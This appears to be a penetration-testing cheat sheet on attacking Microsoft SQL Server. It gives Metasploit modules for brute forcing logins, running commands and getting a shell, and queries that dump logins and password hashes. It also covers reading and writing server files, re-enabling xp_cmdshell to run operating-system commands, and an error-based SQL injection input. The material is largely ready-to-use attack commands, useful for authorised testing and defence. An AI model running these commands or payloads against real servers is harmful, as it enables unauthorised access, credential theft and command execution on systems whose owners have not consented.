Access­ing in Linux:

impacket-mssqlclient Administrator:password@$target -windows-auth

Default data­bas­es are:

• mas­ter
• tem­pdb
• mod­el
• msdb

Enumeration

Deter­mine version

nmap -p 445 --script ms-sql-info $target

Via metas­ploit

auxiliary/scanner/mssql/mssql_ping

Via Impack­et

mssqlinstance.py $target

Login brute force

scanner/mssql/mssql_login

When an account is known, enu­mer­ate for vulnerabilities

auxiliary/admin/mssql/mssql_enum

Exploitation

Exe­cute commands

auxiliary/admin/mssql/mssql_exec

Get shell

windows/mssql/mssql_payload

Tools

Com­mand line

sqsh -U sa -P $password -S $target:1433

From Pow­er­Shell

sqlcmd -S $DBNAME -Q "use ADsync; select instance_id,keyset_id,entropy from mms_server_configuration"

Graph­i­cal

dbeaver

IntelliJ

Exploita­tion

• msdat

Usage

After a com­mand in a native MSSQL com­mand line, we need to type \go to exe­cute it.

1> SELECT VERSION();
2> \go

This is not need­ed in some tools like Impack­ets mssqlclient.

Useful queries

Get ver­sion:

SELECT @@version;

Enu­mer­at­ing users

SELECT name FROM master.syslogins;

Enu­mer­at­ing users

SELECT * FROM master.sys.sysusers;

Pass­word hash­es from SQL users

SELECT name, password_hash FROM master.sys.sql_logins;

Enu­mer­at­ing databases

SELECT name FROM master.sysdatabases;

Cur­rent database

SELECT DB_NAME();

Get details from a spe­cif­ic database:

SELECT * FROM $dbname.information_schema.tables;

• Then, query like this:
  SELECT * FROM $dbname.$schema.$tableName;

Read local files

CREATE TABLE ttt (line varchar(8000));

BULK INSERT ttt FROM 'C:\Windows\System32\License.rtf';
SELECT * FROM ttt;
DELETE FROM ttt;
...

DROP TABLE ttt;

Write files. This requires the bcp mod­ule. Enter it with­out para­me­ters and exe­cute the com­mand to see if it is installed.

bcp "SELECT * FROM ttt" queryout C:\rrr.htm -c -Slocalhost -Usa -P$pass

Pos­si­ble alternative

execute spWriteStringToFile 'This article ctddfd', 'C:\inetpub\wwwroot\','d.txt'

Exe­cute command

EXEC xp_cmdshell 'dir'

• Note: Should xp_cmdshell not been acti­vat­ed, try to acti­vate it:
  SQL (SQLPLAYGROUND\Administrator dbo@master)> EXECUTE sp_configure 'show advanced options', 1;
SQL (SQLPLAYGROUND\Administrator dbo@master)> RECONFIGURE;
SQL (SQLPLAYGROUND\Administrator dbo@master)> EXECUTE sp_configure 'xp_cmdshell', 1;
[*] INFO(SQL01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (SQLPLAYGROUND\Administrator dbo@master)> RECONFIGURE;

For INSERT queries

Try to get infor­ma­tion with­in the con­vert statement:

' + convert(int,@@version) + '

Notes

Use­ful ressources with more queries:

• pen­test­mon­key
• grace­fulse­cu­ri­ty
• hacktricks.xyz
• exploit­db paper
• Error based SQL injection